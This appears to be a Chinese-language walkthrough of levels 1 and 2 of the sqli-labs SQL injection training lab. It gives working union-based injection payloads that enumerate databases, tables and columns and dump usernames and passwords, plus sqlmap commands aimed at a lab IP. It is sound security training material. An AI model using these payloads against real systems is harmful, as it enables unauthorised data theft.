sqli-labs第一二关

Less-1（GET -Error based -single quotes -String)

手工注入

闭合方式判断

访问第一关，先直接看一下参数

?id=1

接下来就要看看这里是什么闭合方式（简单说就是网站的代码用了什么符号在变量名），先加个'看看

?id=1'

出现了报错（记得要用英文输入，不然不会报错的）

一下是关卡的部分源码

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

我们看到当我们输入?id=1'是语句变成了这样

$sql="SELECT * FROM users WHERE id='1'' LIMIT 0,1";

根据计算机的引号配对我们输入的'还缺少一个'与其对应，产生报错，对此我们就知道前面会有'

接下来我们就需要判断这里有没有漏洞（只的是这个参数能不能产生漏洞）(顺带看看后面符号的情况）

?id=1 or 1=1 #

?id=1' or '1'='1 #

通过符号配对都可以才出来

接下来就可以注入了，接下来就来看看它的回显位

回显位判断

union select

?id=1' union select 1,1,1'

到了第四个的时候会报错

说明只有三个回显位

order by

利用order by进行排序，也可以看出有多少的回显位

?id=1' order by 3 --+

？id=1' order by 4 --+

注：使用order by时注释号应该是’--+‘

查数据库名

在MySQL5.0版本以后默认自带一个information_schema数据库，里面有所有数据库名、表名、字段名。

?id=-1' union selec 1,group_concat(schema_name),3 from information_schema.schemata--+

注：前面为假，后面为真会显示后面查询结果

该网站数据库的名字是=security

查询表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

查询列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

查询敏感信息

查询数据

?id=-1' union select 1,2,group_concat(username,password) from users--+

自动化注入工具

检测漏洞是否存在

sqlmap.py -u 192.168.21.133/sqli/Less-1/?id=1 --batch

爆破数据库名

sqlmap.py -u 192.168.21.133/sqli/Less-1/?id=1 --dbs --batch

爆破表名

sqlmap.py -u 192.168.21.133/sqli/Less-1/?id=1 -D security --tables --batch

爆破列名

sqlmap.py -u 192.168.21.133/sqli/Less-1/?id=1 -D security -T users --columns --batch

爆破数据

sqlmap.py -u 192.168.21.133/sqli/Less-1/?id=1 -D security -T users -C password,username -dump --batch

结束

Less-2（GET -Error based -lntiger based)

手工注入

注意这里流程和第一关唯一不同是没有'

其余可以以第一关的教程解决